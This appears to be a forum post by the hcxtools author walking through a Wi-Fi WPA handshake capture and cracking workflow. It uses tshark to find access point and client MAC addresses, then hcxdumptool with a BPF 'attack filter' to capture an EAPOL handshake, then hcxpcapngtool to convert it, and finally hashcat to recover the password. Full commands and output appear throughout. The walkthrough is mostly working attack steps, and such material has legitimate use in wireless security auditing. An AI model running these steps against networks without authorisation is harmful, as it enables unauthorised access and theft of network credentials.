Use tshark to get information required to build a BPF

[ZerBea]

To get information about the target (e.g. to build an attack filter), tsahrk should be the first choice to retrieve it:

Show all frames addressed to AP's:
$ tshark -i INTERFACE_NAME -Y "wlan.fc.ds == 1" -T fields -e wlan.ra -e wlan.ta

Show all frames addressed to a known AP:
$ tshark -i INTERFACE_NAME -Y "wlan.ra == MAC_AP" -T fields -e wlan.ra -e wlan.ta

There is more than one display filter to get the information.

A complete example (using different filter commands - but the information is the same):

$ sudo nmcli dev wifi list

$ sudo hcxdumptool -m wlp48s0f4u2u1 -c 10a

$ tshark -i wlp48s0f4u2u1 -T fields -e wlan.bssid
Capturing on 'wlp48s0f4u2u1'
08:96:d7:98:e1:9e

$ tshark -i wlp48s0f4u2u1 -Y "wlan.ra == 08:96:d7:98:e1:9e" -T fields -e wlan.ta
Capturing on 'wlp48s0f4u2u1'
00:e6:2d:02:2a:87

$ hcxdumptool --bpfc="wlan addr3 ffffffffffff or wlan addr3 0896d798e19e or wlan addr2 00e62d022a87 or wlan addr1 00e62d022a87" > attack.bpf

$ sudo hcxdumptool -i wlp48s0f4u2u1 --bpf=attack.bpf --exitoneapol=7 -w test.pcapng
0 ERROR(s) during runtime
136 Packet(s) captured by kernel
0 Packet(s) dropped by kernel
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
18 EPB written to pcapng dumpfile

exit on EAPOL M1M2


$ hcxpcapngtool test.pcapng -o test.22000
hcxpcapngtool 6.3.2-48-g369f6f5 reading from test.pcapng...

summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.7.2-arch1-1
application..............................: hcxdumptool 6.3.2-169-gb0c006b
interface name...........................: wlp48s0f4u2u1
interface vendor.........................: 00e62d
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 806d97bf5ccb (incremented on every new client)
MAC CLIENT...............................: 8c8401f6d1be
REPLAYCOUNT..............................: 64686
ANONCE...................................: d41adbe7e48fc29207c49ccce5843bd991ca41703a9d421b60e7c29e63ec6dae
SNONCE...................................: 483bcc0308f7c11eaf9e63222fc3c910736db22600fcb0495f7c3428a31f467e
timestamp minimum (GMT)..................: 30.01.2024 11:11:09
timestamp maximum (GMT)..................: 30.01.2024 11:11:09
duration of the dump tool (seconds)......: 0
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 18
packets received on 2.4 GHz..............: 18
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10 
PROBEREQUEST (undirected)................: 1
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 1
AUTHENTICATION (OPEN SYSTEM).............: 1
EAPOL messages (total)...................: 14
EAPOL RSN messages.......................: 14
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
EAPOL M1 messages (total)................: 13
EAPOL M2 messages (total)................: 1
EAPOL pairs (total)......................: 1
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M12E2 (challenge)..................: 1

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2457: 18	

Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).
It strongly recommended to recapture the traffic or to use --all option to convert all possible EAPOL MESSAGE PAIRs.


session summary
---------------
processed pcapng files................: 1

$ hashcat -m 22000 test.22000 -a 3 "12345678"
hashcat (v6.2.6-848-gc1a10518f) starting
...
1f7b8b5b21b2b6d68b1d1fb60b518f6d:0896d798e19e:00e62d022a87:AP_7272:12345678
...   
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Jan 30 11:13:06 2024 (0 secs)
Time.Estimated...: Tue Jan 30 11:13:06 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       93 H/s (0.41ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 46c Fan: 30% Util: 11% Core:2835MHz Mem:10802MHz Bus:16

Started: Tue Jan 30 11:13:05 2024
Stopped: Tue Jan 30 11:13:07 2024

BTW:
This warning was expected:

Information: missing EAPOL M3 frames!
This dump file does not contain EAPOL M3 frames (possible packet loss).

because hcxdumptool has been told (by option exitoneapol) to terminate after an EAPOL MESSAGE PAIR has been received.
That was the case on M1M2. As the M3 has been transmitted, hcxdumptool has been already terminated.